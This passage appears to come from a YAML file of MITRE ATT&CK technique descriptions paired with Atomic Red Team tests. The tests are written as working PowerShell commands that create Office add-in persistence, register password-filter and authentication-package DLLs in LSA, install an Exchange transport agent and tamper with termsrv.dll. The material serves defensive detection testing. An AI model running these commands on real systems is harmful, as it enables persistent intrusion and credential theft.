auto_generated_guid: 95408a99-4fa7-4cd6-a7ef-cb65f86351cf
description: "Creates a Word Add-in file (WLL) which runs automatically when
Word is started\nThe sample WLL provided launches the notepad as a proof-of-concept
for persistent execution from Office.\nSuccessfully tested on 32-bit Office
2016. Not successful from microsoft 365 version of Office. \n"
supported_platforms:
- windows
dependencies:
- description: 'Microsoft Word must be installed
'
prereq_command: |
try {
New-Object -COMObject "Word.Application" | Out-Null
Stop-Process -Name "winword"
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
'
- description: WLL files must exist on disk at specified location
prereq_command: 'if ((Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x64.wll")
-and (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x86.wll"))
{exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/wordwll_x64.wll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x64.wll"
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/wordwll_x86.wll" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\wordwll_x86.wll"
executor:
name: powershell
command: "$wdApp = New-Object -COMObject \"Word.Application\"\nif(-not $wdApp.path.contains(\"Program
Files (x86)\")) \n{\n Write-Host \"64-bit Office\"\n Copy \"PathToAtomicsFolder\\T1137.006\\bin\\Addins\\wordwll_x64.wll\"
\"$env:APPDATA\\Microsoft\\Word\\Startup\\notepad.wll\" \n}\nelse{\n
\ Write-Host \"32-bit Office\"\n Copy \"PathToAtomicsFolder\\T1137.006\\bin\\Addins\\wordwll_x86.wll\"
\"$env:APPDATA\\Microsoft\\Word\\Startup\\notepad.wll\"\n}\nStop-Process
-Name \"WinWord\" \nStart-Process \"WinWord\"\n"
cleanup_command: |
Stop-Process -Name "notepad","WinWord" -ErrorAction Ignore
Start-Sleep 3
Remove-Item "$env:APPDATA\Microsoft\Word\Startup\notepad.wll" -ErrorAction Ignore
- name: Persistent Code Execution Via Excel VBA Add-in File (XLAM)
auto_generated_guid: '082141ed-b048-4c86-99c7-2b8da5b5bf48'
description: |
Creates an Excel VBA Add-in file (XLAM) which runs automatically when Excel is started
The sample XLAM provided launches the notepad as a proof-of-concept for persistent execution from Office.
supported_platforms:
- windows
dependencies:
- description: 'Microsoft Excel must be installed
'
prereq_command: |
try {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
manually to meet this requirement"
'
- description: XLAM file must exist on disk at specified location
prereq_command: 'if (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\ExcelVBAaddin.xlam")
{exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/ExcelVBAaddin.xlam" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\ExcelVBAaddin.xlam"
executor:
name: powershell
command: "Copy \"PathToAtomicsFolder\\T1137.006\\bin\\Addins\\ExcelVBAaddin.xlam\"
\"$env:APPDATA\\Microsoft\\Excel\\XLSTART\\notepad.xlam\" \nStart-Process
\"Excel\"\n"
cleanup_command: |
Stop-Process -Name "notepad","Excel" -ErrorAction Ignore
Start-Sleep 3
Remove-Item "$env:APPDATA\Microsoft\Excel\XLSTART\notepad.xlam" -ErrorAction Ignore
- name: Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)
auto_generated_guid: f89e58f9-2b49-423b-ac95-1f3e7cfd8277
description: |
Creates a PowerPoint VBA Add-in file (PPAM) which runs automatically when PowerPoint is started
The sample PPA provided launches the notepad as a proof-of-concept for persistent execution from Office.
supported_platforms:
- windows
dependencies:
- description: 'Microsoft Excel must be installed
'
prereq_command: |
try {
New-Object -COMObject "PowerPoint.Application" | Out-Null
Stop-Process -Name "PowerPnt"
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft PowerPoint
manually to meet this requirement"
'
- description: PPAM file must exist on disk at specified location
prereq_command: 'if (Test-Path "PathToAtomicsFolder\T1137.006\bin\Addins\PptVBAaddin.ppam")
{exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\T1137.006\bin\Addins\" -Force | Out-Null
Invoke-Webrequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1137.006/bin/Addins/PptVBAaddin.ppam" -UseBasicParsing -OutFile "PathToAtomicsFolder\T1137.006\bin\Addins\PptVBAaddin.ppam"
executor:
name: powershell
command: |
Copy "PathToAtomicsFolder\T1137.006\bin\Addins\PptVBAaddin.ppam" "$env:APPDATA\Microsoft\Addins\notepad.ppam"
$ver = (New-Object -COMObject "PowerPoint.Application").version
$ExcelRegPath="HKCU:\Software\Microsoft\Office\$Ver\PowerPoint\AddIns\notepad"
New-Item -type Directory $ExcelRegPath -Force | Out-Null
New-ItemProperty $ExcelRegPath "Autoload" -value "1" -propertyType DWORD | Out-Null
New-ItemProperty $ExcelRegPath "Path" -value "notepad.ppam" -propertyType string | Out-Null
Stop-Process -Name "PowerPnt" -ErrorAction Ignore
Start-Process "PowerPnt"
cleanup_command: |-
$ver = (New-Object -COMObject "PowerPoint.Application").version
Remove-Item "HKCU:\Software\Microsoft\Office\$Ver\PowerPoint\AddIns\notepad" -ErrorAction Ignore
Stop-Process -Name "notepad","PowerPnt" -ErrorAction Ignore
Start-Sleep 3
Remove-Item "$env:APPDATA\Microsoft\AddIns\notepad.ppam" -ErrorAction Ignore
T1505.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1
created: '2019-12-12T15:08:20.972Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1505/002
external_id: T1505.002
- source_name: Microsoft TransportAgent Jun 2016
description: Microsoft. (2016, June 1). Transport agents. Retrieved June 24,
2019.
url: https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help
- source_name: ESET LightNeuron May 2019
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:38.001Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
on email messages passing through the transport pipeline to perform various
tasks such as filtering spam, filtering malicious attachments, journaling,
or adding a corporate signature to the end of all outgoing emails.(Citation:
Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport
agents can be written by application developers and then compiled to .NET
assemblies that are subsequently registered with the Exchange server. Transport
agents will be invoked during a specified stage of email processing and carry
out developer defined tasks. \n\nAdversaries may register a malicious transport
agent to provide a persistence mechanism in Exchange Server that can be triggered
by adversary-specified email events.(Citation: ESET LightNeuron May 2019)
Though a malicious transport agent may be invoked for all emails passing through
the Exchange transport pipeline, the agent can be configured to only carry
out specific tasks in response to adversary defined criteria. For example,
the transport agent may only carry out an action like copying in-transit attachments
and saving them for later exfiltration if the recipient email address matches
an entry on a list provided by the adversary. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- ESET
- Christoffer Strömblad
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
x_mitre_version: '1.1'
identifier: T1505.002
atomic_tests:
- name: Install MS Exchange Transport Agent Persistence
auto_generated_guid: 43e92449-ff60-46e9-83a3-1a38089df94d
description: |
Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla.
More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help
supported_platforms:
- windows
input_arguments:
class_factory:
description: Class factory of transport agent.
type: string
default: Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory
dll_path:
description: Path of DLL to use as transport agent.
type: path
default: c:\program files\microsoft\Exchange Server\v15\bin\Microsoft.Exchange.Security.Interop.dll
transport_agent_identity:
description: Friendly name of transport agent once installed.
type: string
default: Security Interop Agent
dependencies:
- description: 'Microsoft Exchange SnapIn must be installed
'
prereq_command: 'Get-TransportAgent -TransportService FrontEnd
'
get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn
'
executor:
command: |
Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}
Enable-TransportAgent #{transport_agent_identity}
Get-TransportAgent | Format-List Name,Enabled
cleanup_command: |
if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){
Disable-TransportAgent #{transport_agent_identity}
Uninstall-TransportAgent #{transport_agent_identity}
Get-TransportAgent
}
name: powershell
elevation_required: true
T1574.014:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8
created: '2024-03-28T15:36:34.141Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/014
external_id: T1574.014
- source_name: PenTestLabs AppDomainManagerInject
description: Administrator. (2020, May 26). APPDOMAINMANAGER INJECTION AND
DETECTION. Retrieved March 28, 2024.
url: https://pentestlaboratories.com/2020/05/26/appdomainmanager-injection-and-detection/
- source_name: Microsoft App Domains
description: Microsoft. (2021, September 15). Application domains. Retrieved
March 28, 2024.
url: https://learn.microsoft.com/dotnet/framework/app-domains/application-domains
- source_name: PwC Yellow Liderc
description: PwC Threat Intelligence. (2023, October 25). Yellow Liderc ships
its scripts and delivers IMAPLoader malware. Retrieved March 29, 2024.
url: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html
- source_name: Rapid7 AppDomain Manager Injection
description: 'Spagnola, N. (2023, May 5). AppDomain Manager Injection: New
Techniques For Red Teams. Retrieved March 29, 2024.'
url: https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T21:48:08.401Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
the `AppDomainManager` class to create and manage one or more isolated runtime
environments (called application domains) inside a process to host the execution
of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run
as .NET code) may be loaded into an application domain as executable code.(Citation:
Microsoft App Domains) \n\nKnown as \"AppDomainManager injection,\" adversaries
may execute arbitrary code by hijacking how .NET applications load assemblies.
For example, malware may create a custom application domain inside a target
process to load and execute an arbitrary assembly. Alternatively, configuration
files (`.config`) or process environment variables that define .NET runtime
settings may be tampered with to instruct otherwise benign .NET applications
to load a malicious assembly (identified by name) into the target process.(Citation:
PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation:
Rapid7 AppDomain Manager Injection)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Thomas B
- Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1098.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--35d30338-5bfa-41b0-a170-ec06dfd75f64
created: '2023-07-14T14:01:50.806Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1098/006
external_id: T1098.006
- source_name: AWS EKS IAM Roles for Service Accounts
description: Amazon Web Services. (n.d.). IAM roles for service accounts.
Retrieved July 14, 2023.
url: https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html
- source_name: Google Cloud Kubernetes IAM
description: Google Cloud. (n.d.). Create IAM policies. Retrieved July 14,
2023.
url: https://cloud.google.com/kubernetes-engine/docs/how-to/iam
- source_name: Kuberentes ABAC
description: Kuberenets. (n.d.). Using ABAC Authorization. Retrieved July
14, 2023.
url: https://kubernetes.io/docs/reference/access-authn-authz/abac/
- source_name: Kubernetes RBAC
description: Kubernetes. (n.d.). Role Based Access Control Good Practices.
Retrieved March 8, 2023.
url: https://kubernetes.io/docs/concepts/security/rbac-good-practices/
- source_name: Aquasec Kubernetes Attack 2023
description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
2023.
url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
- source_name: Microsoft Azure Kubernetes Service Service Accounts
description: Microsoft Azure. (2023, April 28). Access and identity options
for Azure Kubernetes Service (AKS). Retrieved July 14, 2023.
url: https://learn.microsoft.com/en-us/azure/aks/concepts-identity
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T21:46:31.661Z'
name: Additional Container Cluster Roles
description: "An adversary may add additional roles or permissions to an adversary-controlled
user or service account to maintain persistent access to a container orchestration
system. For example, an adversary with sufficient permissions may create a
RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes
account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023)
Where attribute-based access control (ABAC) is in use, an adversary with sufficient
permissions may modify a Kubernetes ABAC policy to give the target account
additional permissions.(Citation: Kuberentes ABAC)\n \nThis account modification
may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136)
or other malicious account activity. Adversaries may also modify existing
[Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have
compromised. \n\nNote that where container orchestration systems are deployed
in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes
Service, and Azure Kubernetes Service, cloud-based role-based access control
(RBAC) assignments or ABAC policies can often be used in place of or in addition
to local permission assignments.(Citation: Google Cloud Kubernetes IAM)(Citation:
AWS EKS IAM Roles for Service Accounts)(Citation: Microsoft Azure Kubernetes
Service Service Accounts) In these cases, this technique may be used in conjunction
with [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003)."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
x_mitre_version: '1.0'
atomic_tests: []
T1053:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
created: '2017-05-31T21:30:46.977Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053
external_id: T1053
- source_name: ProofPoint Serpent
description: Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New
Backdoor Targets French Entities with Unique Attack Chain. Retrieved April
11, 2022.
url: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
- source_name: TechNet Task Scheduler Security
description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved
June 8, 2016.
url: https://technet.microsoft.com/en-us/library/cc785125.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:38.539Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Prashant Verma, Paladion
- Leo Loobeek, @leoloobeek
- Travis Smith, Tripwire
- Alain Homewood, Insomnia Security
- Andrew Northern, @ex_raritas
- Bryan Campbell, @bry_campbell
- Zachary Abzug, @ZackDoesML
- Selena Larson, @selenalarson
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Containers
- ESXi
x_mitre_version: '2.4'
x_mitre_remote_support: false
atomic_tests: []
T1556.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
created: '2020-02-11T19:05:45.829Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/002
external_id: T1556.002
- source_name: Clymb3r Function Hook Passwords Sept 2013
description: Bialek, J. (2013, September 15). Intercepting Password Changes
With Function Hooking. Retrieved November 21, 2017.
url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- source_name: Carnal Ownage Password Filters Sept 2013
description: Fuller, R. (2013, September 11). Stealing passwords every time
they change. Retrieved November 21, 2017.
url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:39.067Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
as they are validated. \n\nWindows password filters are password policy enforcement
mechanisms for both domain and local accounts. Filters are implemented as
DLLs containing a method to validate potential passwords against password
policies. Filter DLLs can be positioned on local computers for local accounts
and/or domain controllers for domain accounts. Before registering new passwords
in the Security Accounts Manager (SAM), the Local Security Authority (LSA)
requests validation from each registered filter. Any potential changes cannot
take effect until every registered filter acknowledges validation. \n\nAdversaries
can register malicious password filters to harvest credentials from local
computers and/or entire domains. To perform proper validation, filters must
receive plain-text credentials from the LSA. A malicious password filter would
receive these plain-text credentials every time a password request is made.(Citation:
Carnal Ownage Password Filters Sept 2013)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Vincent Le Toux
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c
description: "Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.\nThe binary in bin is https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection\nSource
is in src folder. \nThis does require a reboot to see the filter loaded into
lsass.exe. \nIt does require Administrative privileges to import the clean
registry values back into LSA, it is possible you may have to manually do
this after for cleanup.\n"
supported_platforms:
- windows
input_arguments:
dll_path:
description: Path to DLL to be installed and registered
type: path
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: string
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: 'AtomicRedTeamPWFilter.dll must exist on disk at specified location
(#{dll_path}\#{dll_name})
'
prereq_command: 'if (Test-Path "#{dll_path}\#{dll_name}") {exit 0} else {exit
1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
cleanup_command: |
reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
- name: Install Additional Authentication Packages
auto_generated_guid: 91580da6-bc6e-431b-8b88-ac77180005f2
description: "lsass.exe loads all DLLs specified by the Authentication Packages
REG_MULTI_SZ value.\nUses PowerShell to install and register a password filter
DLL. Requires a reboot and administrative privileges.\nThe binary in bin is
https://www.virustotal.com/gui/file/95140c1ad39fd632d1c1300b246293297aa272ce6035eecc3da56e337200221d/detection\nSource
is in src folder. \nThis does require a reboot to see the filter loaded into
lsass.exe. \nIt does require Administrative privileges to import the clean
registry values back into LSA, it is possible you may have to manually do
this after for cleanup.\n"
supported_platforms:
- windows
input_arguments:
dll_path:
description: Path to DLL to be installed and registered as additional authentication
package
type: path
default: PathToAtomicsFolder\T1556.002\bin
dll_name:
description: Name of the Password Filter
type: string
default: AtomicRedTeamPWFilter.dll
dependency_executor_name: powershell
dependencies:
- description: 'AtomicRedTeamPWFilter.dll must exist on disk at specified location
(#{dll_path}\#{dll_name})
'
prereq_command: 'if (Test-Path "#{dll_path}\#{dll_name}") {exit 0} else {exit
1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll" -OutFile "#{dll_path}\#{dll_name}"
executor:
command: |
reg.exe export HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
$passwordFilterName = (Copy-Item "#{dll_path}\#{dll_name}" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$AuthenticationPackagesValues = $lsaKey.GetValue("Authentication Packages")
$AuthenticationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Authentication Packages" $AuthenticationPackagesValues
cleanup_command: |
reg.exe import "PathToAtomicsFolder\T1556.002\lsa_backup.reg"
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
T1505.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
created: '2022-03-28T15:34:44.590Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1505/005
external_id: T1505.005
- source_name: James TermServ DLL
description: James. (2019, July 14). @James_inthe_box. Retrieved September
12, 2024.
url: https://x.com/james_inthe_box/status/1150495335812177920
- source_name: Microsoft System Services Fundamentals
description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
Retrieved March 28, 2022.
url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- source_name: Microsoft Remote Desktop Services
description: Microsoft. (2019, August 23). About Remote Desktop Services.
Retrieved March 28, 2022.
url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- source_name: RDPWrap Github
description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
Retrieved March 28, 2022.
url: https://github.com/stascorp/rdpwrap
- source_name: Windows OS Hub RDP
description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:39.258Z'
name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll.(Citation: Microsoft System Services Fundamentals) The termsrv.dll file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll file or modifying the ServiceDll value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
identifier: T1505.005
atomic_tests:
- name: Simulate Patching termsrv.dll
auto_generated_guid: 0b2eadeb-4a64-4449-9d43-3d999f4a317b
description: |
Simulates patching of termsrv.dll by making a benign change to the file and replacing it with the original afterwards.
Before we can make the modifications we need to take ownership of the file and grant ourselves the necessary permissions.
supported_platforms:
- windows
executor:
elevation_required: true
command: |
$termsrvDll = "C:\Windows\System32\termsrv.dll"
$ACL = Get-Acl $termsrvDll
$permission = "Administrators","FullControl","Allow"
$accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission
$ACL.SetAccessRule($accessRule)
Set-Acl -Path $termsrvDll -AclObject $ACL
Copy-Item -Path "C:\Windows\System32\termsrv.dll" -Destination "C:\Windows\System32\termsrv_backup.dll" -ErrorAction Ignore
Add-Content -Path "C:\Windows\System32\termsrv.dll" -Value "`n" -NoNewline -ErrorAction Ignore
Move-Item -Path "C:\Windows\System32\termsrv_backup.dll" -Destination "C:\Windows\System32\termsrv.dll" -Force -ErrorAction Ignore
cleanup_command: 'Move-Item -Path "C:\Windows\System32\termsrv_backup.dll"
-Destination "C:\Windows\System32\termsrv.dll" -Force -ErrorAction Ignore
'
name: powershell
- name: Modify Terminal Services DLL Path
auto_generated_guid: 18136e38-0530-49b2-b309-eed173787471
description: This atomic test simulates the modification of the ServiceDll value
in HKLM\System\CurrentControlSet\services\TermService\Parameters. This technique
may be leveraged by adversaries to establish persistence by loading a patched
version of the DLL containing malicious code.
supported_platforms:
- windows
executor:
elevation_required: true
command: |-
$termsrvDll = "C:\Windows\System32\termsrv.dll"
$ACL = Get-Acl $termsrvDll
$permission = "Administrators","FullControl","Allow"
$accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission
$ACL.SetAccessRule($accessRule)
Set-Acl -Path $termsrvDll -AclObject $ACL
Copy-Item -Path $termsrvDll -Destination "$HOME\AtomicTest.dll"
$newServiceDll = "$HOME\AtomicTest.dll"
